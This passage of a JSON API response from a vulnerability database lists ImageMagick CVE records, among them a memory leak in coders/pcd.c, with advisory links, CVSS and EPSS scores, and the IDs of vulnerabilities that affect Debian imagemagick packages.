"VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27763" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ay8n-59tt-k7cp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82844?format=api", "vulnerability_id": "VCID-b32k-mwuv-hfeq", "summary": "imagemagick: memory leak in function DecodeImage in coders/pcd.c", "references": [ { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00034.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00034.html" }, { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00006.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00006.html" }, { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-7175.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-7175.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.45765", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.45776", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.45854", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.45908", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.45901", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.4583", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.45852", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.45802", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.45858", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.45855", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.45877", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.45847", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/1e6a3ace073c9ec9c71e439c111d23c6e66cb6ae", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/commit/1e6a3ace073c9ec9c71e439c111d23c6e66cb6ae" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/issues/1450", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/issues/1450" }, { "reference_url": "https://www.debian.org/security/2020/dsa-4712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1687436", "reference_id": "1687436", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1687436" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7175", "reference_id": "CVE-2019-7175", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:L/Au:N/C:N/I:N/A:P" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7175" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4034-1/", "reference_id": "USN-4034-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4034-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": 